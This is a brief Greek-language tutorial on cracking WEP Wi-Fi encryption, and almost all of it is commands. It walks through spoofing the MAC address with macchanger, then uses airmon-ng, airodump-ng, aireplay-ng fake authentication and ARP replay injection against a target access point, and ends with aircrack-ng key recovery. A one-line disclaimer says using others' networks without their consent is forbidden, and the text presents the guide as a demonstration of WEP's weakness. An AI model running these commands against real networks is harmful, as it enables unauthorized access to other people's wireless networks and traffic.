WEP cracking, the easy way

DISCLAIMER: Απαγορεύεται η είσοδος και χρήση ασύρματων δικτύων τρίτων χωρίς την ρητή έγκρισή τους.

Λόγω εσωτερικών σχεδιαστικών προβλημάτων το πρωτόκολλο ασφαλείας WEP μπορεί να καμφθεί με πολύ εύκολο τρόπο. Ένας απλός οδηγός για να διαπιστώσει κανείς τη ματαιότητα του πράγματος.

Προαιρετικά μπορούμε να αλλοιώσουμε την διεύθυνση MAC του υπολογιστή μας ως εξής:

ΒΗΜΑ 0:
macchanger --mac 00:11:22:33:44:55 wifi0

Και περνάμε στο κυρίως πιάτο. Για καλύτερη εποπτεία χρειάζονται τρία τερματικά ανοιχτά. Τα ονομάζω Τ1, Τ2 και Τ3. Πριν από κάθε εντολή θα υπάρχει το όνομα του τερματικού στο οποίο εκτελείται.

ΒΗΜΑ 1:
Τ1:      airmon-ng start wifi0

ΒΗΜΑ 2:
T1:      airodump-ng ath1

ΒΗΜΑ 3:
Τ2:      airodump-ng -c CHANNEL --bssid BSSID -w filename ath1
όπου CHANNEL και BSSID το κανάλι και η διεύθυνση MAC του Target Access Point αντίστοιχα.

ΒΗΜΑ 4:
Τ1:      aireplay-ng -1 0 -e SSID -a BSSID ath1
όπου SSID είναι το target network name.

ΒΗΜΑ 5:
Τ3:     aireplay-ng -3 -b BSSID ath1 -x 500

περιμένουμε μέχρι να έχουμε συγκεντρώσει αρκετά πακέτα DATA και εκτελούμε:

BHMA 6:
T1:      aircrack-ng -b BSSID filename*.cap